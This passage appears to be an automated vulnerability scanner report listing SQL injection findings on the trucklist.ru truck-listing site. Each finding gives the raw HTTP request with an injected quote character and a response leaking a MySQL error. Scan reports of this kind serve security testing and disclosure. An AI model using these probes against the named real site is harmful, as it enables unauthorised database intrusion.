Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:02:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:02:39 GMT
Content-Length: 6600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /cars/undefined'' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:02:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:48:03 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.8. http://www.trucklist.ru/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /favicon.ico' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:00:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:00:05 GMT
Content-Length: 6594

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.9. http://www.trucklist.ru/plugins/ajax/enums.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/plugins/ajax/enums.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

POST /plugins/ajax/enums.php' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
Origin: http://www.trucklist.ru
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30
Content-Length: 19

name=truck_make_&_=

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:49:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:49:45 GMT
Content-Length: 6616

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.10. http://www.trucklist.ru/plugins/ajax/enums.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/plugins/ajax/enums.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

POST /plugins/ajax/enums.php/1' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
Origin: http://www.trucklist.ru
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30
Content-Length: 19

name=truck_make_&_=

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:48:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:33:25 GMT
Content-Length: 6620

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.11. http://www.trucklist.ru/vendors/calendar/super_calendar.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/vendors/calendar/super_calendar.js

Issue detail

Request

GET /vendors/calendar/super_calendar.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:47:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:32:52 GMT
Content-Length: 6640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.12. http://www.trucklist.ru/webroot/delivery/css/global.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/css/global.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /webroot/delivery/css/global.css'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:53:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:39:13 GMT
Content-Length: 6634

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/css/global.css''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:54:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:39:25 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.13. http://www.trucklist.ru/webroot/delivery/js/global.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/global.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 4, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /webroot/delivery/js/global.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:47:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:47:36 GMT
Content-Length: 6630

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.14. http://www.trucklist.ru/webroot/delivery/js/jquery.cookie.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/jquery.cookie.js

Issue detail

Request

GET /webroot/delivery/js/jquery.cookie.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:32:09 GMT
Content-Length: 6644

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.15. http://www.trucklist.ru/webroot/delivery/js/jquery.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/jquery.js

Issue detail

Request 1

GET /webroot/delivery/js/jquery.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:53:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:53:28 GMT
Content-Length: 6630

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/js/jquery.js''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:53:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:38:54 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.16. http://www.trucklist.ru/webroot/delivery/js/jquery.json.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/jquery.json.js

Issue detail

Request 1

GET /webroot/delivery/js/jquery.json.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:46:36 GMT
Content-Length: 6640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/js/jquery.json.js''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:32:02 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.17. http://www.trucklist.ru/webroot/delivery/js/prototype.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/prototype.js

Issue detail

Request 1

GET /webroot/delivery/js/prototype.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:54:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:54:16 GMT
Content-Length: 6636

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/js/prototype.js''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:54:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:39:49 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.18. http://www.trucklist.ru/webroot/delivery/js/scripts.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
